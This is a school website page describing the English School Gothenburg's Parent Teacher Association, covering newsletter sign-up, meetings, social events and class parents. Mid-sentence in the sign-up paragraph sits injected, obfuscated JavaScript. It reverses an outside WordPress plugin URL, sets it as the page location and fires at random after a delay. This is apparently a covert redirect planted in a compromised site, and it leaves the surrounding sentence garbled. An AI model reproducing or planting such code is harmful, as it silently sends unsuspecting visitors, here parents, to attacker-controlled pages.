As a parent with a child at the English School Gothenburg you are automatically a member of the school’s Parent Teacher Association (PTA).
The PTA is inviting all parents to sign up via this link to receive newsletters and further communications from the PTA.
Even if you have signed up before, please toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do so again as we have changed our systems.
Sign up stay informed
The PTA exists to support the school and the children through a focus on social events and a forum where staff and parents may raise ideas for improvement, general concerns, and questions. Member meetings are held about four to five times per academic year where the PTA receives regular updates from the School Board and the Head Teacher about news and developments at the school. The PTA board, which is elected by parents every May for the following year, aims to also include information on important topics such as drug abuse, mental health, gaming, etc. to help parents navigate in raising happy and successful children. All parents are welcome to attend.
PTA events are a great way to meet and socialise with other parents at the school. It is made up of a fantastic group of motivated Parents and Teachers that have your children’s best interests at heart. Its success is obviously dependent on parental support of all kinds but we are most interested in any special skills (or direct contacts with such) you may have that can contribute towards the wide range of activities. Contact the PTA via the post box outside the front office or via email. You will find additional information on past, present and future PTA activities in its own section here on the School website.
In addition to the PTA there are also Class Parents for most year groups, typically two representatives for each class, chosen by each class. They may organise social activities for the kids of their classes (e.g. play dates, outings) and coordinate fundraising for e.g. teacher appreciation gifts.